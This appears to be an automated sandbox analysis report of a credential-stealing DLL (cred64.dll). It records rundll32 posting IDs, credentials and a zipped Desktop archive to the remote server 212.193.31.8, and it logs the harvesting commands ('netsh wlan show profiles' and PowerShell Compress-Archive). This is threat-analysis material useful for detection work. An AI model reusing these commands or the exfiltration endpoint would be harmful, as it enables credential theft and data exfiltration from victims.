                                                                      Dec 23, 2024 06:38:26.150477886 CET1.1.1.1192.168.2.40xd774No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Dec 23, 2024 06:38:26.150477886 CET1.1.1.1192.168.2.40xd774No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • 212.193.31.8

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730212.193.31.8806868C:\Windows\System32\rundll32.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 23, 2024 06:38:02.722656012 CET178OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 21
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                      Data Ascii: id=246122658369&cred=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449731212.193.31.8806836C:\Windows\System32\rundll32.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 23, 2024 06:38:02.734761953 CET178OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 21
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                      Data Ascii: id=246122658369&cred=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449732212.193.31.8802836C:\Windows\System32\rundll32.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 23, 2024 06:38:08.873013973 CET178OUTPOST /3ofn3jf3e2ljk2/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 21
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                      Data Ascii: id=246122658369&cred=


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449739212.193.31.8806836C:\Windows\System32\rundll32.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 23, 2024 06:38:39.731342077 CET174OUTPOST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----MzA4NA==
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 3244
                                                                      Cache-Control: no-cache
                                                                      Dec 23, 2024 06:38:39.731420994 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 7a 41 34 4e 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                      Data Ascii: ------MzA4NA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                      Dec 23, 2024 06:38:39.731570005 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                      Data Ascii: PK
                                                                      Dec 23, 2024 06:38:39.731602907 CET8OUTData Raw: 08 00 54 40 44 57 ba eb
                                                                      Data Ascii: T@DW
                                                                      Dec 23, 2024 06:38:39.731631994 CET8OUTData Raw: bd 05 84 02 00 00 02 04
                                                                      Data Ascii:
                                                                      Dec 23, 2024 06:38:39.731709003 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                      Data Ascii: _F
                                                                      Dec 23, 2024 06:38:39.731738091 CET8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                                                      Data Ascii: iles_\DV
                                                                      Dec 23, 2024 06:38:39.731765032 CET8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                                                      Data Ascii: WHKMNFNN
                                                                      Dec 23, 2024 06:38:39.731791019 CET8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                      Data Ascii: .docxI
                                                                      Dec 23, 2024 06:38:39.731897116 CET8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                                                      Data Ascii: r@!D
                                                                      Dec 23, 2024 06:38:39.731924057 CET8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                                                      Data Ascii: ?p


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.449740212.193.31.8806868C:\Windows\System32\rundll32.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 23, 2024 06:38:39.748743057 CET174OUTPOST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----MzA4NA==
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 3244
                                                                      Cache-Control: no-cache
                                                                      Dec 23, 2024 06:38:39.748800993 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 7a 41 34 4e 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                      Data Ascii: ------MzA4NA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                      Dec 23, 2024 06:38:39.748861074 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                      Data Ascii: PK
                                                                      Dec 23, 2024 06:38:39.748929977 CET8OUTData Raw: 08 00 54 40 44 57 ba eb
                                                                      Data Ascii: T@DW
                                                                      Dec 23, 2024 06:38:39.748974085 CET8OUTData Raw: bd 05 84 02 00 00 02 04
                                                                      Data Ascii:
                                                                      Dec 23, 2024 06:38:39.749044895 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                      Data Ascii: _F
                                                                      Dec 23, 2024 06:38:39.749070883 CET8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                                                      Data Ascii: iles_\DV
                                                                      Dec 23, 2024 06:38:39.749098063 CET8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                                                      Data Ascii: WHKMNFNN
                                                                      Dec 23, 2024 06:38:39.749128103 CET8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                      Data Ascii: .docxI
                                                                      Dec 23, 2024 06:38:39.749159098 CET8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                                                      Data Ascii: r@!D
                                                                      Dec 23, 2024 06:38:39.749187946 CET8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                                                      Data Ascii: ?p


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.449741212.193.31.8802836C:\Windows\System32\rundll32.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 23, 2024 06:38:47.535706043 CET174OUTPOST /3ofn3jf3e2ljk2/index.php?wal=1 HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----MzA4NA==
                                                                      Host: 212.193.31.8
                                                                      Content-Length: 3244
                                                                      Cache-Control: no-cache
                                                                      Dec 23, 2024 06:38:47.535809994 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 7a 41 34 4e 41 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                      Data Ascii: ------MzA4NA==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                      Dec 23, 2024 06:38:47.535830975 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                      Data Ascii: PK
                                                                      Dec 23, 2024 06:38:47.535847902 CET8OUTData Raw: 08 00 54 40 44 57 ba eb
                                                                      Data Ascii: T@DW
                                                                      Dec 23, 2024 06:38:47.535866976 CET8OUTData Raw: bd 05 84 02 00 00 02 04
                                                                      Data Ascii:
                                                                      Dec 23, 2024 06:38:47.535897017 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                      Data Ascii: _F
                                                                      Dec 23, 2024 06:38:47.535917044 CET8OUTData Raw: 69 6c 65 73 5f 5c 44 56
                                                                      Data Ascii: iles_\DV
                                                                      Dec 23, 2024 06:38:47.535936117 CET8OUTData Raw: 57 48 4b 4d 4e 46 4e 4e
                                                                      Data Ascii: WHKMNFNN
                                                                      Dec 23, 2024 06:38:47.535952091 CET8OUTData Raw: 2e 64 6f 63 78 15 93 49
                                                                      Data Ascii: .docxI
                                                                      Dec 23, 2024 06:38:47.535969973 CET8OUTData Raw: 72 40 21 08 44 f7 a9 ca
                                                                      Data Ascii: r@!D
                                                                      Dec 23, 2024 06:38:47.536040068 CET8OUTData Raw: a1 1c 3f 0e a8 88 e2 70
                                                                      Data Ascii: ?p


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\loaddll64.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:loaddll64.exe "C:\Users\user\Desktop\cred64.dll.dll"
                                                                      Imagebase:0x7ff776540000
                                                                      File size:165'888 bytes
                                                                      MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:1
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\cmd.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
                                                                      Imagebase:0x7ff749870000
                                                                      File size:289'792 bytes
                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Main
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:00:38:00
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",#1
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:00:38:01
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh wlan show profiles
                                                                      Imagebase:0x7ff768ff0000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:6
                                                                      Start time:00:38:01
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh wlan show profiles
                                                                      Imagebase:0x7ff768ff0000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:7
                                                                      Start time:00:38:01
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:00:38:01
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:00:38:03
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\cred64.dll.dll,Save
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:00:38:06
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Main
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:00:38:06
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\cred64.dll.dll",Save
                                                                      Imagebase:0x7ff665ff0000
                                                                      File size:71'680 bytes
                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:00:38:07
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\netsh.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:netsh wlan show profiles
                                                                      Imagebase:0x7ff768ff0000
                                                                      File size:96'768 bytes
                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:00:38:07
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:17
                                                                      Start time:00:38:23
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:18
                                                                      Start time:00:38:23
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:19
                                                                      Start time:00:38:23
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:20
                                                                      Start time:00:38:23
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:21
                                                                      Start time:00:38:30
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:22
                                                                      Start time:00:38:30
                                                                      Start date:23/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Executed Functions

                                                                        Function 00007FFD9B5A55CD Relevance: .4, Instructions: 390COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2081250853.00007FFD9B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b5a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f0b6de8f842239c44058a7cf6efd1352d5c521298bce0ae5ed2e787335f8a54d
                                                                        • Instruction ID: aa3f5c33a43d605a9f7fc1ab30401395bd2b1209f82110447271aadb1484bca3
                                                                        • Opcode Fuzzy Hash: f0b6de8f842239c44058a7cf6efd1352d5c521298bce0ae5ed2e787335f8a54d
                                                                        • Instruction Fuzzy Hash: D0C12952A0FBC60FE7A7977818758647FE1EF5222071A01FBD098DB1E3E9186C4AC352
                                                                        Function 00007FFD9B5A572D Relevance: .1, Instructions: 93COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2081250853.00007FFD9B5A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5A0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b5a0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4c4bed063450c1c04cae70bef4b5cac3d8f2dcb23a944306e2d8415a7681f535
                                                                        • Instruction ID: 32c61d0dd0117219fa037abc2dac9ba9541d61932e75c45a2f54ee085cf426eb
                                                                        • Opcode Fuzzy Hash: 4c4bed063450c1c04cae70bef4b5cac3d8f2dcb23a944306e2d8415a7681f535
                                                                        • Instruction Fuzzy Hash: E721D262A0FBC54FD3639B7858359957FB0AF0326070A02FBD0EADB1E3D9186846C711
                                                                        Function 00007FFD9B4D33B5 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.2079810751.00007FFD9B4D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_7ffd9b4d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction ID: 941caad0e1379d1fcea83a3e80d6860ad08381257d065ab0d9e8ba1741cac88e
                                                                        • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                        • Instruction Fuzzy Hash: 3801A73020CB0C4FD748EF0CE051AA5B3E0FB85364F10056EE58AC36A1DA32E882CB41